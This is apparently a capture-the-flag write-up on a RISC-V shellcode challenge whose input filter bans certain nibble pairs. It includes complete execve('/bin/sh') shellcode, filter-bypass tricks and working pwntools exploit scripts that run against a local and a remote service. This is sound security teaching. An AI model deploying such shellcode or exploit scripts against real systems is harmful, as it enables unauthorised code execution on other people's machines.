Binary
The given binary risky-business is a 64-bit, dynamically linked executable compiled for RISC-V.
$ file risky-business
risky-business: ELF 64-bit LSB pie executable, UCB RISC-V, RVC, double-float ABI, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-riscv64-lp64d.so.1, for GNU/Linux 4.15.0, BuildID[sha1]=2bb703ff4a5af43fb10e8ca4fd8a39b488a701f7, not stripped
$ checksec risky-business
[*] 'risky-business'
Arch: riscv64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
To execute it we can download the RISC-V libraries with sudo apt install libc6-riscv64-cross and run it under QEMU with qemu-riscv64 -L /usr/riscv64-linux-gnu ./risky-business. Unfortunately this doesn’t tell us much, as the program just takes an input and exits without any output, so let’s decompile it with Ghidra to see what it is doing.
Understanding the program
This is the main() function of the program, decompiled by Ghidra after I renamed the variables.
void main(void)
{
  int len;
  char next_nibble;
  int a;
  int b;
  int i;
  char buffer [72];
  long canary;
  char previous_nibble;
  canary = ___stack_chk_guard;
  fgets(buffer,0x43,_stdin);
  len = strlen(buffer);
  a = len - 1;
  b = len - 2;
  previous_nibble = buffer[len + -1] >> 4;
  for (i = (len - 1) * 2; -1 < i; i--) {
    if ((i & 1) == 0) {
      next_nibble = buffer[a] & 0xf;
      a = a + -1;
    }
    else {
      next_nibble = buffer[b] >> 4;
      b = b + -1;
    }
    if ((((previous_nibble == 7) && (next_nibble == 3)) ||
        ((previous_nibble == 0 && (next_nibble == 0)))) ||
       ((previous_nibble == 0 && (next_nibble == 10)))) goto exit;
    previous_nibble = next_nibble;
  }
  (*(code *)buffer)(buffer);
exit:
  if (canary != ___stack_chk_guard) {
    exit(0);
  }
  return;
}
We can see that the program first reads up to 66 bytes of input (the 0x43 passed to fgets includes the null terminator of the string) and then checks each pair of adjacent nibbles in our input, walking from the last byte to the first, to blacklist the combinations 0x73, 0x00 and 0x0a. If we pass the check, our input is executed, so this is a shellcode challenge with a blacklist. If the restriction were only on whole bytes, the check would mainly prevent us from using a syscall instruction in our input (ecall is b"\x73\x00\x00\x00") or from hardcoding /bin/sh in our input, as 0x73 is also the value of s. Unfortunately we will have a few more complications, since the check also covers pairs that straddle two bytes, but let’s think about that later.
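To make the check concrete, here is a minimal Python model of the loop in main(). It is a sketch, not the challenge's own code: the names BLACKLIST and passes_filter are mine, and the function expects only the bytes that strlen would count.

```python
# (previous_nibble, next_nibble) combinations rejected by main()
BLACKLIST = {(0x7, 0x3), (0x0, 0x0), (0x0, 0xA)}


def passes_filter(data: bytes) -> bool:
    """Walk the nibbles from the last byte to the first, high nibble before low."""
    nibbles = []
    for byte in reversed(data):
        nibbles.append(byte >> 4)
        nibbles.append(byte & 0xF)
    # Every adjacent pair is checked, including pairs that span two bytes
    return all(pair not in BLACKLIST for pair in zip(nibbles, nibbles[1:]))


print(passes_filter(b"\x37"))      # a lone 0x37 byte
print(passes_filter(b"\x30\x07"))  # low nibble of 0x07 followed by high nibble of 0x30
```

The second call is the interesting one: neither 0x30 nor 0x07 is a blacklisted byte, but read backwards the nibbles are 0, 7, 3, 0, which contains the pair 7, 3.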
The thing to be careful about with 0x0a being blacklisted is that our shellcode must not end with a \n when we send it. fgets will wait until we send 66 bytes or a line terminator, but if it receives the newline, it will be included in the string that is checked and make us fail. The intuitive solution is therefore to make sure we always send as much data as fgets is expecting.
Another option is to terminate the shellcode ourselves with a null byte, so that the input ends with \x00\x0a and the line terminator is ignored by the check. While thinking about this explanation, though, I realised something I could have used to simplify the challenge a bit. Do you see it?
Think about what is being checked exactly.
Yes, the check expects the shellcode to be a continuous string, which seems intuitive since we are calling the function “get a string from a file”. But gets and fgets do not treat the null byte \x00 as a terminator, only the line terminator \x0a, while strlen stops at the first null byte. This means that if we had an instruction with a null byte at the beginning of the shellcode, we could write anything afterwards and it would not be checked. The only constraint would be the length.
Since \x00 is usually THE byte to avoid in any shellcode, I really didn’t think about this when solving the challenge, but I kinda love the idea of almost having as a constraint that we MUST use it at some point, and now I’m wondering if it was intended or not. If you want to practice when you are done with this writeup, try to write your own shellcode this way ;-)
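The difference between what fgets stores and what the check looks at can be sketched in a few lines of Python. This is only a model under my own assumptions: fgets_model and checked_part are hypothetical helper names, and the input stream is treated as one bytes object.

```python
FGETS_SIZE = 0x43  # second argument of fgets in main()


def fgets_model(stream: bytes, size: int = FGETS_SIZE) -> bytes:
    """Bytes fgets would store: at most size - 1, stopping after the first newline."""
    limit = size - 1
    newline = stream.find(b"\n", 0, limit)
    return stream[:limit] if newline == -1 else stream[: newline + 1]


def checked_part(buffer: bytes) -> bytes:
    """Bytes the nibble check sees: everything before the first null byte (strlen)."""
    return buffer.split(b"\x00", 1)[0]


# A full-length payload: the trailing newline is never read
print(len(fgets_model(b"A" * 66 + b"\n")))
# A null byte early on hides everything after it from the check
print(checked_part(fgets_model(b"\x13\x05\x00\x73\x00\x00\x00\n")))
```

In the second example the stored buffer still contains the raw ecall bytes and the newline, but only the two bytes before the null byte would be walked by the blacklist loop.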
The other thing I noticed is that although checksec says the stack is not executable, this doesn’t seem to be enforced. From what I found, it is standard for RISC-V, or at least when running under qemu-user, to have an executable stack regardless of the NX flag, but I don’t know enough about it (https://github.com/riscvarchive/riscv-glibc/issues/5).
Writing the shellcode
Since I had never worked with RISC-V before, I started from a generic shellcode from shell-storm that calls execve("/bin/sh") without using the bytes 0x20, 0x0a and 0x00. Here is the specific shellcode I used, 76 bytes long:
| entry0 ();
| 0x000100b0 0111 addi sp, sp, -32
| 0x000100b2 06ec sd ra, 24(sp)
| 0x000100b4 22e8 sd s0, 16(sp)
| 0x000100b6 13042102 addi s0, sp, 34
| 0x000100ba b767696e lui a5, 0x6e696
| 0x000100be 9387f722 addi a5, a5, 559
| 0x000100c2 2330f4fe sd a5, -32(s0)
| 0x000100c6 b7776810 lui a5, 0x10687
| 0x000100ca 33480801 xor a6, a6, a6
| 0x000100ce 0508 addi a6, a6, 1
| 0x000100d0 7208 slli a6, a6, 0x1c
| 0x000100d2 b3870741 sub a5, a5, a6
| 0x000100d6 9387f732 addi a5, a5, 815
| 0x000100da 2332f4fe sd a5, -28(s0)
| 0x000100de 930704fe addi a5, s0, -32
| 0x000100e2 0146 li a2, 0
| 0x000100e4 8145 li a1, 0
| 0x000100e6 3e85 mv a0, a5
| 0x000100e8 9308d00d li a7, 221
| 0x000100ec 93063007 li a3, 115
| 0x000100f0 230ed1ee sb a3, -260(sp)
| 0x000100f4 9306e1ef addi a3, sp, -258
\ 0x000100f8 6780e6ff jr -2(a3)
Understanding the RISC-V shellcode
Reading the shellcode, I identified 4 main sections.
Firstly it creates a new frame on the stack for this “function” and stores the registers ra and s0 to preserve them, but this can easily be removed since we don’t need to preserve the state of the process.
| 0x000100b0 0111 addi sp, sp, -32 # sp = sp - 32
| 0x000100b2 06ec sd ra, 24(sp) # *(sp + 24) = ra
| 0x000100b4 22e8 sd s0, 16(sp) # *(sp + 16) = s0
| 0x000100b6 13042102 addi s0, sp, 34 # s0 = sp + 34
Then it builds /bin and /sh\x00 in the register a5, stores the complete string /bin/sh\x00 on the stack and loads the pointer to it into a5. a6 is used to compute the null terminator in /sh\x00 without having to put a null byte in the shellcode.
| 0x000100ba b767696e lui a5, 0x6e696 # a5 = 0x6e696000 [a5 = b"\x00`in"]
| 0x000100be 9387f722 addi a5, a5, 559 # a5 = a5 + 0x22f [a5 = b"/bin"]
| 0x000100c2 2330f4fe sd a5, -32(s0) # *(s0 - 32) = a5
| 0x000100c6 b7776810 lui a5, 0x10687 # a5 = 0x10687000 [a5 = b"\x00ph\x10"]
| 0x000100ca 33480801 xor a6, a6, a6 # a6 = 0x0
| 0x000100ce 0508 addi a6, a6, 1 # a6 = 0x1
| 0x000100d0 7208 slli a6, a6, 0x1c # a6 = 0x10000000
| 0x000100d2 b3870741 sub a5, a5, a6 # a5 = a5 - a6 [a5 = b"\x00ph\x00"]
| 0x000100d6 9387f732 addi a5, a5, 815 # a5 = a5 + 0x32f [a5 = b"/sh\x00"]
| 0x000100da 2332f4fe sd a5, -28(s0) # *(s0 - 28) = a5
| 0x000100de 930704fe addi a5, s0, -32 # a5 = s0 - 32
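The arithmetic in this block can be replayed in plain Python. The sketch below models the two registers as integers and the stack as a small bytearray. The variable names and the 16-byte buffer are my own, and the two sd instructions are modelled as 8-byte little-endian stores at offsets 0 and 4.

```python
import struct

MASK64 = (1 << 64) - 1

# lui a5, 0x6e696 ; addi a5, a5, 559
bin_part = (0x6E696 << 12) + 559

# lui a5, 0x10687 ; a6 = 1 << 0x1c ; sub a5, a5, a6 ; addi a5, a5, 815
a6 = 1 << 0x1C
sh_part = (0x10687 << 12) - a6 + 815

# sd a5, -32(s0) then sd a5, -28(s0): the second store overlaps the first
stack = bytearray(16)
stack[0:8] = struct.pack("<Q", bin_part & MASK64)
stack[4:12] = struct.pack("<Q", sh_part & MASK64)

path = bytes(stack[:8])
print(hex(bin_part), hex(sh_part), path)
```

The second store overwrites the upper half of the first one, which is how the two 4-byte halves end up next to each other as a single null-terminated string.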
Next it loads all the arguments for the syscall execve("/bin/sh\x00", 0, 0), where a7 holds the syscall number while a0 to a2 are the arguments.
| 0x000100e2 0146 li a2, 0 # args[2] = 0
| 0x000100e4 8145 li a1, 0 # args[1] = 0
| 0x000100e6 3e85 mv a0, a5 # args[0] = &bin_sh
| 0x000100e8 9308d00d li a7, 221 # sys_execve
Finally, since the ecall instruction also contains null bytes, this shellcode generates it in a3, saves it on the stack (which, as we remember, is executable) and then jumps to it. It has to jump to an offset from the register rather than directly to it, though, to avoid instructions that have a null byte (jr 0(a3) would contain a null byte due to the offset 0x00, while jalr xx, a3 has a null byte in the instruction itself).
| 0x000100ec 93063007 li a3, 115 # a3 = 0x0000000073
| 0x000100f0 230ed1ee sb a3, -260(sp) # *(sp - 260) = a3
| 0x000100f4 9306e1ef addi a3, sp, -258 # a3 = sp - 258
\ 0x000100f8 6780e6ff jr -2(a3) # jump (a3 - 2)
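As a rough illustration of this last step, the following Python sketch models the memory around sp. It relies on an assumption the shellcode itself makes implicitly, namely that the three bytes after sp - 260 are already zero. The value chosen for sp and the size of the buffer are arbitrary.

```python
ECALL = (0x73).to_bytes(4, "little")  # ecall is the 32-bit word 0x00000073

memory = bytearray(1024)  # assumption: the unused stack below sp is zero-filled
sp = 512                  # hypothetical stack pointer, as an index into memory

a3 = 115
memory[sp - 260] = a3 & 0xFF  # sb a3, -260(sp) writes the single byte 0x73
a3 = sp - 258                 # addi a3, sp, -258
target = a3 - 2               # jr -2(a3) jumps to a3 - 2

fetched = bytes(memory[target:target + 4])
print(target == sp - 260, fetched == ECALL)
```

Only one byte is ever written. The other three bytes of the instruction come from memory that happens to be zero, so the trick would stop working if something non-zero were left at those addresses.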
Simplify the shellcode
To use this shellcode we have two problems to solve. First of all, the shellcode is too long for our challenge, and as we will soon see, it also has a few nibble pairs that are not allowed.
We can start by removing the part of the shellcode that sets up the new stack frame, focus on making the shellcode valid, and then look into how to shorten it further if needed. I will cut the first 4 instructions and use sp directly instead of s0 when storing b"/bin/sh\x00" on the stack.
0: 6e6967b7 lui a5, 0x6e696
4: 22f78793 addi a5, a5, 559
8: fef13023 sd a5, -32(sp)
c: 106877b7 lui a5, 0x10687
10: 01084833 xor a6, a6, a6
14: 0805 addi a6, a6, 1
16: 0872 slli a6, a6, 0x1c
18: 410787b3 sub a5, a5, a6
1c: 32f78793 addi a5, a5, 815
20: fef13223 sd a5, -28(sp)
24: fe010793 addi a5, sp, -32
28: 4601 li a2, 0
2a: 4581 li a1, 0
2c: 853e mv a0, a5
2e: 0dd00893 li a7, 221
32: 07300693 li a3, 115
36: eed10e23 sb a3, -260(sp)
3a: efe10693 addi a3, sp, -258
3e: ffe68067 jr -2(a3)
You may notice that the byte representation of the instructions is different. The listing from shell-storm shows the bytes in memory order, while the disasm() function from pwntools that I’m using here prints the value of each little-endian instruction word, so its bytes appear reversed. This latter representation is better for our challenge since it coincides with the order in which the nibble pairs are checked. The shellcode is now exactly 66 bytes long, but we can see that li a7, 221 and li a3, 115 have a 00 pair in them, and li a3, 115 also contains a 73 pair.
To solve this problem we can do some math instead of loading 221 directly into a7. The factors of 221 are 13 and 17, so we can load our register with:
2e: 4335 li t1, 13
30: 42c5 li t0, 17
32: 026288b3 mul a7, t0, t1
Then for a3 we just have to use an offset from the a7 we just computed.
36: f9688693 addi a3, a7, 115 - 221
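To see where the forbidden pairs come from, it helps to encode the instructions by hand. The sketch below is a small encoder for addi only (li with an immediate of this size is assembled as addi rd, zero, imm). The REGS table and the function names are mine, and it only looks at pairs inside a single instruction, not at pairs formed with its neighbours.

```python
# Register numbers from the RISC-V calling convention (only the ones needed here)
REGS = {"zero": 0, "a3": 13, "a7": 17}


def encode_addi(rd: str, rs1: str, imm: int) -> int:
    """I-type encoding: imm[11:0] | rs1 | funct3=000 | rd | opcode=0x13."""
    assert -2048 <= imm <= 2047
    return ((imm & 0xFFF) << 20) | (REGS[rs1] << 15) | (REGS[rd] << 7) | 0x13


def word_hex(word: int) -> str:
    return f"{word:08x}"


li_a7 = word_hex(encode_addi("a7", "zero", 221))    # li a7, 221
li_a3 = word_hex(encode_addi("a3", "zero", 115))    # li a3, 115
fixed = word_hex(encode_addi("a3", "a7", 115 - 221))  # addi a3, a7, -106

for name, text in (("li a7", li_a7), ("li a3", li_a3), ("addi a3", fixed)):
    print(name, text, [pair for pair in ("73", "00", "0a") if pair in text])
```

The immediate sits in the top 12 bits of the word, so a small positive constant always starts with a 0 nibble, while a negative offset such as -106 is encoded as 0xf96 and avoids it.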
Unfortunately the shellcode is now too long, at 70 bytes, and we will have to modify it even further, but I’m not super confident I won’t break it by accident (spoiler: I did, a few times…), so let’s make sure that it continues to work. Skip the next section if you just want to go to the solution.
Make sure the shellcode is always correct
This script first checks that we don’t have blacklisted pairs of nibbles, then executes the program and changes the length argument of fgets at runtime to make sure the whole shellcode is read even if ours is currently too long. If at the end we reach execve("/bin/sh\x00", NULL, NULL), we know the current iteration of the shellcode is valid and that we only have to shorten it further; if not, we can pinpoint which instruction didn’t behave as expected. I will not go through all the mistakes I made while writing the shellcode, but at least here is how I found them.
To debug programs emulated with QEMU, remember that you first need to install gdb-multiarch and link the libraries for qemu with sudo ln -s /usr/riscv64-linux-gnu/ /etc/qemu-binfmt/riscv64.
from gdb_plus import *
binary_name = "risky-business"
# Make sure to set the context so that pwntools will use gdb-multiarch to debug the program
exe = ELF(binary_name, checksec=True)
context.binary = exe
# Already setup the ip of the server for when we will want to get the flag
HOST = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(HOST, PORT)
shellcode = asm("""
lui a5, 0x6e696
addi a5, a5, 559
sd a5, -32(sp)
lui a5, 0x10687
xor a6, a6, a6
addi a6, a6, 1
slli a6, a6, 0x1c
sub a5, a5, a6
addi a5, a5, 815
sd a5, -28(sp)
addi a5, sp, -32
li a2, 0
li a1, 0
mv a0, a5
li t1, 13
li t0, 17
mul a7, t0, t1
addi a3, a7, 115 - 221
sb a3, -260(sp)
addi a3, sp, -258
jr -2(a3)
""").ljust(0x42, b"A")
# Make sure the program respects the blacklist
def nibble_string(shellcode):
    # The check walks the bytes from last to first, high nibble before low,
    # which is exactly the hex dump of the reversed shellcode
    return shellcode[::-1].hex()
assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")
# Change the argument of fgets to the length of our payload
def extend_read(dbg):
    size = dbg.args[1]
    if len(shellcode) >= size:
        log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
        dbg.args[1] = len(shellcode) + 1 # Overwrite the argument
    return False # Tell gdb to not stop after executing the callback
dbg.b("fgets", callback=extend_read)
CALL_SHELLCODE = 0x896 # Address taken from ghidra
dbg.until(CALL_SHELLCODE, wait=False) # Let the program run until it jumps to the shellcode
dbg.p.sendline(shellcode)
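When one of the assertions fails, it is handy to know where the offending pair sits. The helper below is a standalone sketch that does not need pwntools: bad_pairs is a hypothetical name, and the two instructions used as input are the li a7, 221 and li a3, 115 encodings from the listing above.

```python
BLACKLISTED = ("73", "00", "0a")


def bad_pairs(shellcode: bytes) -> list:
    """Return (byte offset, pair) for every blacklisted nibble pair.

    The offset is that of the byte holding the first nibble of the pair; a pair
    that starts on a low nibble continues into the byte just before it.
    """
    reversed_hex = shellcode[::-1].hex()
    hits = []
    for pair in BLACKLISTED:
        start = reversed_hex.find(pair)
        while start != -1:
            hits.append((len(shellcode) - 1 - start // 2, pair))
            start = reversed_hex.find(pair, start + 1)
    return sorted(hits)


# The two instructions as they sit in memory (little-endian words)
li_a7 = bytes.fromhex("0dd00893")[::-1]
li_a3 = bytes.fromhex("07300693")[::-1]
print(bad_pairs(li_a7 + li_a3))
```

Dividing the reported offset by the instruction sizes in the disassembly tells you which instruction to rewrite.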
If we then step with gdb to check what the shellcode is doing we indeed get the correct result
► 0x4001802d9c ecall <SYS_execve>
path: 0x4001802e80 ◂— 0x68732f6e69622f /* '/bin/sh' */
argv: 0
envp: 0
We can also automate the check, so that we just have to execute the script to know immediately that the shellcode is still working, without stepping through it manually in GDB.
...
CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)
if args.QUICK: # We define a new argument for when to run this check
    done.wait() # Wait for the program to reach the breakpoint
    try:
        # Hardware breakpoint, because that address will be overwritten by our
        # shellcode, so we can not use a software breakpoint
        dbg.until(dbg.sp - 260, hw=True)
        assert dbg.next_inst.mnemonic == "ecall"
        assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
        assert dbg.syscall_args[1] == 0
        assert dbg.syscall_args[2] == 0
    except Exception:
        log.error("The shellcode is wrong! Check manually where it messed up.")
    log.success("The shellcode is still right! You can go on.")
    dbg.close()
$ python3 ./solve.py QUICK
[+] Starting local process '/usr/bin/qemu-riscv64': pid 51087
[+] The shellcode is valid!
[!] Your shellcode is still too long! 70/66
[+] The shellcode is still right! You can go on.
[*] Stopped process './risky-business' (pid 51087)
Find 4 more bytes to remove
We can continue to optimise the shellcode. The first thing we can see is that it uses a5 to store the pointer to b"/bin/sh\x00" and then moves it to a0, while we can store it there immediately. This removes 2 bytes. My second optimisation came from looking at the length of xor a6, a6, a6, which is 4 bytes long, while li a2, 0 is only 2 bytes long. One option is to use li a6, 0, which is also 2 bytes long; the other is to use a register that is used more often, such as a1 (the compressed forms of xor and sub only accept s0, s1 and a0 to a5), which would have removed 2 bytes both from the xor and from the sub a5, a5, a6.
0: 6e6967b7 lui a5, 0x6e696
4: 22f78793 addi a5, a5, 559
8: fef13023 sd a5, -32(sp)
c: 106877b7 lui a5, 0x10687
10: 4801 li a6, 0
12: 0805 addi a6, a6, 1
14: 0872 slli a6, a6, 0x1c
16: 410787b3 sub a5, a5, a6
1a: 32f78793 addi a5, a5, 815
1e: fef13223 sd a5, -28(sp)
22: fe010513 addi a0, sp, -32
26: 4601 li a2, 0
28: 4581 li a1, 0
2a: 4335 li t1, 13
2c: 42c5 li t0, 17
2e: 026288b3 mul a7, t0, t1
32: f9688693 addi a3, a7, -106
36: eed10e23 sb a3, -260(sp)
3a: efe10693 addi a3, sp, -258
3e: ffe68067 jr -2(a3)
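As a sanity check that does not depend on an assembler, the listing above can be rebuilt from its instruction words in plain Python. This is only a sketch: WORDS is copied by hand from the disassembly, and each word is reversed to get the bytes as they sit in memory.

```python
# Instruction words copied from the listing, in program order
WORDS = [
    "6e6967b7", "22f78793", "fef13023", "106877b7", "4801", "0805", "0872",
    "410787b3", "32f78793", "fef13223", "fe010513", "4601", "4581", "4335",
    "42c5", "026288b3", "f9688693", "eed10e23", "efe10693", "ffe68067",
]

# Each word is printed most significant byte first, memory holds it reversed
shellcode = b"".join(bytes.fromhex(word)[::-1] for word in WORDS)

# Same view as the check in main(): last byte first, high nibble before low
nibbles = shellcode[::-1].hex()
found = [pair for pair in ("73", "00", "0a") if pair in nibbles]

print(len(shellcode), found)
```

The length comes out at 66 bytes, which is the most fgets will read, and none of the three pairs appears, including across instruction boundaries.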
But now, do you see an even simpler option to shorten the shellcode that I missed while solving the challenge?
Quiz moment.
Of course we can use a shift instruction to set the null byte in /sh\x00 instead of wasting 10 bytes with a6. You just have to be careful not to load 0x68732 directly, as the s of sh is still blacklisted, but since we need an addi instruction anyway for the last nibbles, it’s not a problem to change the last 12 bits.
c: 687117b7 lui a5, 0x68711 # a5 = 0x68711000
10: 83a1 srli a5, a5, 0x8 # a5 = 0x00687110
12: 21f78793 addi a5, a5, 0x21f # a5 = 0x0068732f
16: fef13223 sd a5, -28(sp)
Otherwise you can try to compute 0x0068732f as a5 - 0x6e00ef00, but I don’t like the number of null bytes there.
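Both ways of reaching 0x0068732f are easy to check with plain integer arithmetic. The sketch below replays the shift variant, the subtraction variant, and the blacklist check on the four instruction words of the shift listing. It looks at that snippet in isolation, so pairs formed with the surrounding instructions are not covered.

```python
# lui a5, 0x68711 ; srli a5, a5, 0x8 ; addi a5, a5, 0x21f
a5 = 0x68711 << 12
a5 >>= 8
a5 += 0x21F
shift_result = a5

# Alternative: subtract a constant from the "/bin" word still held in a5
subtract_result = 0x6E69622F - 0x6E00EF00

# Words of the shift variant in program order; the check reads them backwards
words = ["687117b7", "83a1", "21f78793", "fef13223"]
nibbles = "".join(reversed(words))
found = [pair for pair in ("73", "00", "0a") if pair in nibbles]

print(hex(shift_result), shift_result.to_bytes(4, "little"), found)
# Loading 0x68732 directly would encode as 687327b7, which contains the pair 73
print("73" in "687327b7")
```

The shift variant needs a single 2-byte instruction to clear the top byte, where the a6 sequence spends 10 bytes on the same job.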
Execute final exploit
from gdb_plus import *
binary_name = "risky-business"
exe = ELF(binary_name, checksec=True)
context.binary = exe
IP = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(IP, PORT)
shellcode = asm("""
lui a5, 0x6e696
addi a5, a5, 559 # 0x6e69622f
sd a5, -32(sp)
lui a5, 0x10687
li a6, 0
addi a6, a6, 1
slli a6, a6, 0x1c
sub a5, a5, a6
addi a5, a5, 815 # 0x0068732f
sd a5, -28(sp)
addi a0, sp, -32
li a2, 0
li a1, 0
li t1, 13
li t0, 17
mul a7, t0, t1
addi a3, a7, -106
sb a3, -260(sp)
addi a3, sp, -258
jr -2(a3)
""").ljust(0x42, b"A")
def nibble_string(shellcode):
    # Last byte first, high nibble before low: the hex dump of the reversed shellcode
    return shellcode[::-1].hex()
assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")
def extend_read(dbg):
    size = dbg.args[1]
    if len(shellcode) >= size:
        log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
        dbg.args[1] = len(shellcode) + 1
    return False
dbg.b("fgets", callback=extend_read)
CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)
if args.QUICK:
    done.wait()
    try:
        dbg.until(dbg.sp - 260, hw=True)
        assert dbg.next_inst.mnemonic == "ecall"
        assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
        assert dbg.syscall_args[1] == 0
        assert dbg.syscall_args[2] == 0
    except Exception:
        log.error("The shellcode is wrong! Check manually where it messed up.")
    log.success("The shellcode is still right! You can go on.")
    dbg.close()
sleep(0.1) # Wait for the execution of the shellcode to finish.
dbg.p.sendline(b"cat flag.txt")
flag = dbg.p.recvline().decode()
log.success(f"FLAG: {flag}") # You won <3
And the exploit works both locally
$ python3 ./solve.py NOPTRACE
[+] Starting local process './risky-business': pid 25461
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: test_flag{solved}
[*] Stopped process './risky-business' (pid 25461)
and remotely
$ python3 ./solve.py REMOTE
[+] Opening connection to 127.0.0.1 on port 4000: Done
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: <REDACTED>
[*] Closed connection to 127.0.0.1 port 4000
Challenge solved! We saw how to write a simple shellcode for RISC-V and that the stack may be executable. Furthermore, I relearned that fgets has no problem at all reading null bytes, although it is about time I remembered it…
Your turn now!